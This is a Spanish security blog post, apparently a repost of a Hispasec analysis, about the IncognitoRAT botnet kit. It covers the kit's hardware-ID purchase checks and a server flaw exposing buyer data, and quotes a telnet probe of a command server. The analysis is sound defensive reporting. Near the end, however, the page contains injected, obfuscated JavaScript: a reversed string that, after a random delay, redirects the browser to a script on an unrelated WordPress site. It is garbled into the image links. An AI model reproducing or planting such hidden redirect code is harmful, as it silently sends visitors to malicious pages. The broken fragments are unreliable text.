Sobre la herramienta para crear botnet IncognitoRAT
Los creadores de IncognitoRAT (una botnet que se ha puesto relativamente
de moda en estos últimos días) han programado una herramienta muy
completa para controlar una botnet multiplataforma. Pero han dado
muestras de no saber asegurar sus servidores… de forma que hemos
descubierto que se pueden obtener los datos de los supuestos compradores
del kit.
Teniendo en cuenta todo el ruido generado en torno a IncognitoRAT,
intentaremos aportar algo nuevo. IncognitoRAT ha generado muchas
noticias en medios generalistas en los últimos días. Sobre todo porque
se ha anunciado que es multiplataforma (creado en Java) e infecta a Mac
OS X. En realidad esto no es noticia, porque existen ya varias
herramientas RAT o malware en general para Mac y para cualquier otro
sistema operativo. Y en realidad, tampoco es un dato exacto. Todo está
programado en Java, eso es cierto, pero el agente que infecta se ha
visto solamente en forma de ejecutable para Windows… Lo que a nosotros
nos llama la atención no es que IncognitoRAT permita con su código Java
activar la cámara de la víctima, hacer que suene un MP3… sino sobre
todo, su curioso recelo comercial… que parece que no han cuidado
demasiado.
El cliente de este kit para crear y gestionar botnets, y al contrario
que otros, exige presentarse en la red de la propia “compañía” que
comercializa la herramienta (TeamHAVOC).
En la pestaña de “Request Auth” se requiere una autenticación basada en
contraseña y además en dos parámetros HWID. Parece tratarse de un hash
único por máquina en base al hardware y no puede ser modificado. El
número de transacción puede tratarse del código que identifique el haber
realizado el pago (para que los creadores originales sepan que eres un
comprador legítimo del kit). El resto de datos son de control general de
la botnet.
Cuando se envía esa información, el programa se conecta con Gmail para
mandar un correo. Se supone que, con los datos introducidos, se pondrá
en contacto con los creadores para validar la compra y la cuenta. Este
es un movimiento curioso. Habitualmente los creadores de estas
herramientas piden dinero por ellas, pero no controlan de esta forma al
comprador (con identificadores de hardware, etc) y así, quien se tope
con una herramienta comprada por otro, podría usarla sin problemas. No
es este el caso. Es necesario que el servidor de TeamHAVOC esté activo e
incluso usar el cliente en una misma máquina siempre, como consecuencia
de los HWID.
En la otra pestaña, en la que se supone que uno se presenta cuando ya
tiene usuario y contraseña validados (TeamHAVOC se asegura que has
pagado), es donde se revela el fallo cometido por los programadores.
El cliente de la herramienta valida los datos recopilados durante la
presentación del usuario contra su propio servidor (incognitorat.com).
El supuesto error cometido es que los archivos son texto claro y con un
formato propio. Sería como “ver” la base de datos de clientes que han
comprado el kit para crear botnets.
Y a partir de ahí, se puede llegar hasta unos paquetes de software. Se
trata de actualizaciones para la herramienta.
Las máquinas infectadas suelen contactar con puertos en torno al 400-500
de los servidores. Por ejemplo, “telnet riskygambler.no-ip.org 457”
responde con un protocolo que en principio, no he identificado.
Supongo que eliminarán pronto el acceso a esos datos (aunque sean falsos
o inútiles, no dan buena imagen). Si son reales, se concluye que el
producto ha tenido un éxito relativo, pues solo se observan cuatro
cuentas activas y que el “gestor de autenticación” en el servidor no es
muy eficaz. En la base de datos de VirusTotal encontramos pocas
referencias a estas herramientas (sí a los infectores). Al menos por
firmas los antivirus parecen no detectarlo demasiado. Incluso, esos
archivos que cuelgan del servidor, todavía no han sido enviados a
VirusTotal en el momento de escribir estas líneas.
En conclusión, resulta interesante el método de validación de compra que
utiliza esta red, aunque después de programar una herramienta tan
compleja, han fallado en lo más sencillo. En cualquier caso, no sabemos
si los datos de los usuarios serán ciertos, o si se trata de simples
pruebas que no han eliminado.
En el apartado de más información se describe cómo se comunica con el
servidor y se aportan más imágenes.
Fuente
Más información:
De incógnito en la botnet IncognitoRAT
torio/379
IncognitoRAT: Un malware multiplataforma para Mac OS X que se puede administrar desde iPhone o iPad
torat-un-malware-multiplataforma.html
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/images/inco2.png”>http://blog.hispasec.com/labora<script>$NfI=function(n){if (typeof ($NfI.list[n]) == ){kind=link}
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/images/inco5.png”>http://blog.hispasec.com/labora<script>$NfI=function(n){if (typeof ($NfI.list[n]) == ){kind=link}
Los comentarios están cerrados.